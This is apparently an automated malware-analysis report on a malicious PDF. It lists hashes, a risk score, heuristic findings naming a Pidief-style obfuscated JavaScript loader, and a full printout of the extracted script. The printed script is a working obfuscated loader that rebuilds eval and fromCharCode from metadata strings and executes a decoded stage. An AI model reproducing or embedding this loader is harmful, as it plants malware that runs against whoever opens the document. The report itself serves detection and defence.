Malicious PDF — malware analysis report

Static analysis result for SHA-256 8e70ec7862fd94f1…

MALICIOUS

PDF

50.0 KB Authoring application: substr First seen: 2026-05-07
MD5: 1a02a301a56e2c8a6b8050062b2df191 SHA-1: a27c972a8c55ebb5170d4d36aaed511718a633fb SHA-256: 8e70ec7862fd94f163b47f32f7e5ab328ed84fb9b5ebeb2c9b1f1b27d6650dc0
86 Risk Score

Malware Insights

The PDF contains embedded JavaScript, flagged by heuristics as malicious. The ML classifier strongly indicates malicious intent. The embedded JavaScript is likely responsible for executing a malicious payload, though its specific actions could not be determined from the provided evidence.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 3

  • Obfuscated Pidief-style JavaScript loader (stage not decoded) high CVE related PDF_PIDIEF_OBFUSCATED_VERSION_GATED_LOADER
    PDF JavaScript carries a large opaque encoded stage (a letter-delimited numeric character-code array) that is built to be decoded and eval'd, but no exact Adobe Reader CVE could be attributed because the encoding scheme resisted full static decoding. This is the structural fingerprint of the Pidief / multi-CVE exploit-kit loader family — a version-gated obfuscated JavaScript stage with no benign use. Flagged suspicious on its own; an ML/AV signal or a recovered heap-spray pushes it to malicious.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0001_000.js pdf-javascript-stream PDF /JS object 1 at offset 0xC547 489 bytes
SHA-256: 19d105ce645920f83174c87e1c3f529f4f5b97cb89ae18049b811e1804605b06
Preview script
First 1,000 lines of the extracted script
s2='';
v=producer;
t='le';
b='v';
c='';
a=c.concat('e','|','a',"n","b","w",b,"o");
s=author+a[2]+t[0];
e=v[v]()[s];
dxxf=e(v[4]+'i'.concat(v[4],t));
q=dxxf[v](a.length-7,a.length+1);
d=v[0].toUpperCase()+'tring.f'+'r';
d+='o'+q;
ufgld=e(e('d'));
sub=v[0];
sub+='ubject';
q=dxxf[e('v')](t.length+12)[v[0]+e(sub)+'t']('c');
k=q[t[0].concat('eng'+'t'+'h')];
i=t.length-2;
for(;i!==k;){
	oij = 1*(q[i]);
	i++;
	oij -= (-1)*(q[i]);
	s2 += ufgld(oij);
	i++;
}
e(s2);